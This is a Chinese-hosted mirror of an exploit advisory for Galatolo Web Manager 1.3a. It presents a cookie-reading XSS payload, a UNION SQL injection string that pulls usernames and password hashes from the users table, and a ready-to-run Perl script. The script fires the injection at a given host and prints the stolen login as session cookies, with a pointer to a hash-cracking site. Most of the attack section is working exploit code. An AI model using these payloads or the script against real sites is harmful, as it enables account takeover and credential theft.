手机
当前位置:查字典教程网 >网络安全 >Exploit >Galatolo Web Manager 1.3a
Galatolo Web Manager 1.3a
摘要:--====================================================================...

--== ============================================================================ ==--

--== Galatolo Web Manager 1.3a <= XSS / Remote SQL Injection Vulnerability ==--

--== ============================================================================ ==--

[*] Discovered By: StAkeR ~ StAkeR@hotmail.it

[ ] Discovered On: 14 Jul 2008

[ ] Download: http://gwm.dev-area.org/view.php?id=8

[*] Vulnerabilities:

[*] XSS <= 1.3a

[ ] all.php?tag= [Code Javascript]

[ ] http://site.com/all.php?tag=<script>alert(document.cookie)</script>

[*] SQL (plugin users) 1.3a

[ ] plugins/users/index.php?id= [Code SQL]

[ ] -1 union select null,concat(user,0x3a,pass),null,concat(user(),0x3a,database(),0x3a,version()) from users where id=1--

[*] Exploit:

#!/usr/bin/perl

use strict;

use LWP::UserAgent;

my $host = shift;

my ($start,$content,@login);

my $evilxx = "/plugins/users/index.php?id=-1 union select 1,concat(0x25,user,0x25,pass),null,null from users where id=1--";

if($host =~ /^http://?/i)

{

$start = new LWP::UserAgent or die "[ ] Unable to connectn";

$start->timeout(1);

$start->agent("Mozilla/4.0 (compatible; Lotus-Notes/5.0; Windows-NT)");

$content = $start->get($host.$evilxx);

if($content->is_success)

{

if($content->content =~ /%(. ?)%([0-9a-f]{32})/)

{

push(@login,$1,$2);

print "[ ] Login:n";

print "[ ] Username: $login[0]n";

print "[ ] Password: $login[1]nn";

print "[ ] Cookie Session:n";

print "[ ] gwm_user = $login[0]n";

print "[ ] gwm_pass = $login[1]nn";

print "[ ] Crack Password:n";

print "[ ] md5(md5(password)) for crack:n";

print "[ ] http://passcracking.comn";

}

else

{

print "[ ] Exploit Failedn";

print "[ ] Site Not Vulnerablen";

}

}

}

else

{

print "[ ] Galatolo Web Manager (plugin users) 1.3 Remote SQL Injectionn";

print "[ ] Exploit Coded By: StAkeR ~ StAkeR@hotmail.itnn";

print "[ ] Usage: Perl $0 <host>n";

print "[ ] Usage: Perl $0 http://site.comn";

}

【Galatolo Web Manager 1.3a】相关文章:

Joomla Component EZ Store Remote Blind SQL Injection Exploit

Acoustica Mixcraft

Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit

Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability

IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit

Maian Recipe

webEdition CMS (we_objectID) Blind SQL Injection Exploit

BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit

Anzio Web Print Object

Maian Cart 1.1 Insecure Cookie Handling Vulnerability

精品推荐
分类导航